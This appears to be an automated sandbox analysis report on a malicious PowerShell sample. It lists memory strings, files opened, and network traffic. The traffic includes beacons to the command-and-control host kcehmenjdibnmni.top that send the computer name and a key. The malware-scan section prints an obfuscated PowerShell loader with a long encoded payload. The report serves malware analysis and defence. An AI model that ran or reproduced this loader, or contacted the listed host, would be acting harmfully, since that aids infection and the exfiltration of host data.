Click to jump to signature section
Source: | Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.9865489113.000001DE90012000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb@% source: powershell.exe, 00000000.00000002.9895133109.000001DEAA781000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.9865489113.000001DE90012000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbY[ source: powershell.exe, 00000000.00000002.9894530059.000001DEAA4D8000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.9865489113.000001DE90012000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbAM source: powershell.exe, 00000000.00000002.9892833800.000001DEAA401000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdbrZ source: powershell.exe, 00000000.00000002.9894530059.000001DEAA4D8000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdbh source: powershell.exe, 00000000.00000002.9865489113.000001DE90012000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGL_n37sGIjBmUPCl_IXUpIiWYRjLAQhjt3fHNt4N93hKUW1o_EHLlyxCVJHj5huIGz9sjaLzWj8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=jHiiHoIq2gWYuflFJ9YGjw6px6HBdolD330I5JdYtY6-8Gxe_MmzVH4dQbneR7rT0a1vqSJsTzqKafUHWgOPJpgthG2bxpdam6zVHllkWqqq37_OIXfcyqNUuAfEH85FyrK-F0ZGOnt79IVrtlour51vQ0ifVsVbSRMesg2dO1VcNYFzH7EQmz47rUfoJI-kBZBS |
Source: global traffic | HTTP traffic detected: GET /sce6dujwmhhtr.php?id=computer&key=21283751447&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kcehmenjdibnmni.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGL_n37sGIjBmUPCl_IXUpIiWYRjLAQhjt3fHNt4N93hKUW1o_EHLlyxCVJHj5huIGz9sjaLzWj8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=jHiiHoIq2gWYuflFJ9YGjw6px6HBdolD330I5JdYtY6-8Gxe_MmzVH4dQbneR7rT0a1vqSJsTzqKafUHWgOPJpgthG2bxpdam6zVHllkWqqq37_OIXfcyqNUuAfEH85FyrK-F0ZGOnt79IVrtlour51vQ0ifVsVbSRMesg2dO1VcNYFzH7EQmz47rUfoJI-kBZBS |
Source: global traffic | HTTP traffic detected: GET /sce6dujwmhhtr.php?id=computer&key=21283751447&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kcehmenjdibnmni.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGL_n37sGIjBmUPCl_IXUpIiWYRjLAQhjt3fHNt4N93hKUW1o_EHLlyxCVJHj5huIGz9sjaLzWj8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=jHiiHoIq2gWYuflFJ9YGjw6px6HBdolD330I5JdYtY6-8Gxe_MmzVH4dQbneR7rT0a1vqSJsTzqKafUHWgOPJpgthG2bxpdam6zVHllkWqqq37_OIXfcyqNUuAfEH85FyrK-F0ZGOnt79IVrtlour51vQ0ifVsVbSRMesg2dO1VcNYFzH7EQmz47rUfoJI-kBZBS |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE93191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.9866576960.000001DE9332F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$b764eusxo23ywv0/$kd48yefho9u132r.php? |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE93191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.9866576960.000001DE93024000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$b764eusxo23ywv0/$kd48yefho9u132r.php?id=$env:computername&key=$tglovf&s=527 |
Source: powershell.exe, 00000000.00000002.9865489113.000001DE90012000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.9891505628.000001DEA9FF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.9892743968.000001DEAA230000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE92D1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.9866576960.000001DE92FF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kcehmenjdibnmni.top |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE92D1A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kcehmenjdibnmni.top/sce6dujwmhhtr.php?id=computer&key=21283751447&s=527 |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE92D1A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kcehmenjdibnmni.top/sce6dujwmhhtr.php?id=computer&key=21283751447&s=527p |
Source: powershell.exe, 00000000.00000002.9886446717.000001DEA1FF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE921AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE921AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE921AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE91F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE921AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE921AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE921AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE93011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.9866576960.000001DE92FFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.9866576960.000001DE92FF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE9332F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE93011000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZnuGL_n37sGIjBmUPCl_IXUpIiWYRjLAQhjt3fHNt4N93hKUW1o_EHLlyxCVJHj5huIGz9 |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE92FFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZnuGL_n37sGIjBmUPCl_IXUpIiW |
Source: powershell.exe, 00000000.00000002.9891505628.000001DEA9FF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE91F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.9886446717.000001DEA1FF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.9886446717.000001DEA1FF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.9886446717.000001DEA1FF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE92FFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE921AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE921AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.9886446717.000001DEA1FF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.9891505628.000001DEA9FF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.9866576960.000001DE9301E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.9866576960.000001DE92FF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.9866576960.000001DE93024000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:304:WilStaging_02 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $60c58n7hps3mley.(([char[]]@((9985-9918),(-7333+(10503484/1411)),(3687-(119+(2556+(-856+1756)))),(-4404+4525),(-7300+(6180408/837)),(1122210/10110)) -join ''))( $binh2xzcd4y7gtj ) $60c58n7hps3mley.((-join (@((1119-(8694780/(10007-(457+1285)))),(-3132+(11712-8472)),(1224-1113),(-3673+3788),(391981/(-2141+(6481-459))))| ForEach-Object { [char]$_ })))()$evxq7k3i9dhlg65.((-join (@((302170/4510),(299484/2773),(3270-(3856-(7370-6673))),(7031-6916),(2018-(-1062+2979)))| ForEach-Object { [char]$_ })))()[byte[]] $wgyrfxl0dhsimv7 = $binh2xzcd4y7gtj.(([char[]]@((-8191+8275),(-3674+(4506-(378+343))),(-736+801),(9066-8952),(1116402/9793),(5284-5187),(7704-(56652593/7471))) -join ''))() $01pumg93kianejy=$wgyrfxl0dhsimv7 return $01pumg93kianejy}[System.Text.Encoding]::ascii.((-join (@((-878+949),(-5009+(6523-(7649982/5414))),(633-517),(437244/5268),(842392/7262),(-6318+(-732+(4110+(-6074+9128)))),(5460-5355),(584870/(15096-(14304-4525))),(1240-(-478+(-3688+5303))))| ForEach-Object { [char]$_ })))((pw2lb40ectk3fa95dvs7oyh8zig "fb9hcms4dDFhZ4L3O7t0pRr/63IluNYuAthSm1/DmLptRTbwWnvY85MZe7d1Fy7mxowhscp8HsiLnsrHmKaqv39bMINQrKq3lcBQJ5Sd3svuDGi03ePWC5fUutyiOMqYltbudbSHDEWbg6w3tfs27LRFBciVvuTXrao37NSEyEiYmerr1au3SxTInu/IhEjwPZqWi7Yn6gycifKJm/E2XARnykkbEdSU4x+0SpXNjZqC8NAjDMiMgInZp17bmd3HxdNWbJTNDP1MsS/afm5TiYzbLno66VyGzxmuTBhgPzyYi7v7eEtYuD1bas3xgd9NDJ2kuiQb4guGsWygnmAqe5ds0owzAWrjz/n/qR1kj6kcXrlSKd41H63mut2XxNHY7Kad5Df77rvbjIvSlOTTDFA6I6sIk4KiXMHProAkFQqje0017YXkyp/h3x7dsIbaNLNX8maAj9GTomjTnK4SbEr1zsQ8Er7wmE512xntJLK739F1kWYroIAbo+WfEVtf9aYurDN9wvqyqUWefoGcJtwuL4RSoK2PcG+/gDhR5VSgdy0zMNbXAPb5G4mq0gCBNdVlCLJKw8w/DFwJy4kkLwvsrvPzjVua9KoCE3xbFrCi/p3a0MVIAwdiPtGJFX0F+0UDYZ/3FUyRi9a/odsWDR3MmwmQZIChhCgKvQqxwcuv3qLUru2dI1r8RGZz+YMuLLsS/wrMzKd1xMkQ9O4/RC5Zp0VWoCUmOSYuFLCrnvkczI4gWb9dS+CUS59JExHp5Yl7MIoEJ4bYTPrO4QPOwr7e42sOK1TFq8oPvlvuRXOUdIGBj7Ei9lJUL/pNXlvRORzHniZj/pyM8PRz/WmViYaDe+dauE4YHMObgpj5FtOOjMgfmqHkiInihy56OekREogXC5raiN2CSJmRofs+oIaI6k4a16ASX8gVj/kkj9CbFdwchsxvhbhr21iE93RCCTrFhwcFalxiYIBYERKN/Eau5bjD83X1wSXt07J5WXaT4p/gI0VVB/ob5QVICb8Gv6GXHIjLdqYPPlCh//rM/PvV8SkCrfNFG6IgLdkZkcSt5W9iU6B9BTFsWoQXl8vG5dTC/tqW6WU5L+nd9tYw2xRWat85++iSlNKIpWTWs8y+6KjT1RVUJmmscCvGc9qlzl2M0syufZkptX+Vn73iqZ2tNrV3iG02rvQoJtWvrfJf7NqxWav3KfJJXPXD0Yd90PMr3EV/UcHH4s5SYjswe7c7heDTNnwXhUoWZ0HnC0OKttLBwbWEDVRBzParhoQs1KZduPTqz+NBkilKG3ihPtUd1bR8A5T6/IJRFZn1I0uxRrM3EWIfta3nQV/vnF8NJfpIUuGNu5i2+XPNUr+24G0JIc7OvkRIkPxEFzo |